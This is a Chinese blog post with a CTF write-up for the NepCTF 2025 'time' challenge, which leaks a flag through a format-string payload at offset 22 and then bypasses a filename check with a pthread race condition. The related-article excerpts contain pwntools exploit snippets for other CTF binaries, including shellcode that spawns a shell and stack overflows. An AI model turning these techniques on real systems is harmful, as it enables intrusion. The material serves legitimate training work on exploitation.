nepctf2025

Created2025-08-01|Updated2025-08-20|比赛

|Post Views:

time

本题可以任意文件读取但会检测不能存在flag，使用pthread执行文件内容读取函数。本题主要考察了格式化字符串漏洞以及多线程条件竞争漏洞。

首先由于本题存在格式化字符串漏洞，因此可以利用该漏洞泄漏flag，于是得知道偏移量是多少。

若直接使用gdb.attach(io,’b *$rebase(0x2D08)’)会发现无法触发断点，是因为gdb尝试脱离父进程并附加子进程，就会无法调试父进程，此时可以set follow-fork-mode parent，使gdb始终保持对父进程的附加调试。

可以看出偏移量为22，那么就可以使用%22$p-%23$p-%24$p-%25$p-%26$p-%27$p-%28$p-%29$p泄漏flag。

接着就是条件竞争绕过对flag的检查，因为每次输入文件名后并不是直接执行start_routine函数，而是通过 pthread_create函数创建新的线程执行，那么这里存在时间竞争漏洞，我们先输入合法的文件名绕过检查，接着 pthread_create函数启动一个新线程，并访问全局变量file，然后主线程进入下一次循环，在新线程执行前/期间再次修改该全局变量，最后就会导致新线程读入修改后的file的内容，从而绕过检测，获得flag。

Author: Star

Link: http://example.com/2025/08/01/nepctf2025/

Copyright Notice: All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.

Related Articles

0xGame2024-复现

where_is_my_binsh 一道简单的题目，存在栈溢出以及system函数，没有/bin/sh\x00字符串，给了变量something的地址，那么就先输入/bin/sh\x00字符串再打ret2text。 from pwn import*io=remote('gz.imxbt.cn',20884)elf=ELF('./where_is_my_binsh')bin_sh=0x0404090system=elf.sym['system']ret=0x040101ardi=0x0401323io.sendlineafter('If you want it ,then you have to create...

GeekChallenge2024

ez_shellcode简单的shellcode from pwn import*context.arch='amd64'io=remote('nc1.ctfplus.cn',39373)shellcode_addr=0x0401256shellcode=asm(shellcraft.sh())io.send(shellcode)payload=cyclic(0x18+8)+p64(shellcode_addr)io.sendline(payload)io.interactive() 你会栈溢出吗？简单的64位栈溢出，注意堆栈平衡 from pwn...

2025_SWPU_NSSCTF_秋季招新训练赛

口算题卡一道计算题，主要考察脚本的编写，但因为没有时间限制，所以可以直接算100道题。 from pwn import*s = lambda buf: io.send(buf)sl = lambda buf: io.sendline(buf)sa = lambda delim, buf: io.sendafter(delim, buf)sal = lambda delim, buf: io.sendlineafter(delim, buf)r = lambda n=None: io.recv(n)ra = lambda t=tube.forever: io.recvall(t)ru = lambda delim: io.recvuntil(delim)rl = lambda: io.recvline()rls = lambda n=2**20: io.recvlines(n)su = lambda buf,addr: io.success(buf + "==>" + hex(addr))io =...

stack一道不错的题目，让我对pwndbg的使用进一步的熟练程序代码很简单，自定义输入字符串长度，通过循环不断输入，那么可以造成栈溢出，并且存在后门函数。但是此题的关键在于变量i会被覆盖，那么就会导致程序根据i将我们输入的东西写入到另一个地方。因此，我们可以找准i的偏移，防止其被覆盖，我们就可以正常栈溢出到返回地址。 from pwn import*io=remote('challenge.imxbt.cn',20197)#io=process('./stack')ret=0x040101abackdoor=0x4012E6def debug(): gdb.attach(io) ...

Game 就是不断输入1至9的数字，当输入的数字的和大于999时获得shell。 from pwn import*io=remote('61.139.2.1',57621)for _ in range(120): io.sendline(b'9')io.interactive() Real_Login简单的签到题目，输入的字符串与程序设定的password一样就能获得shell。 from pwn import*io=remote('61.139.2.1',59414)io.sendlineafter('your input: ',b'NewStar!!!')io.interactive() gdb 该程序先对字符串进行加密，用户再输入字符串并进行对比，若一致则获得flag。使用gdb进行调试。 from pwn import*io=remote('61.139.2.1',63397)io.sendlineafter('data:...

messages 该程序主要由intput_messages函数与print_messages函数组成，主要实现了先将输入的字符串存储到bss段上，再将字符串拷贝到栈上，由于输出时没有检测字符串最大个数，因此可以造成数组下标越界从而覆盖返回地址返回到getflag函数获得flag。 from pwn import*io=remote('61.139.2.1',62280)payload1=(b'aa\0'*16)[:-1]payload2=b'\x01\x01\x00'*3+p64(0x401196)io.sendlineafter('>',payload1)io.sendlineafter('>',payload2)io.sendlineafter('>',b'\n')io.interactive()

Loading Database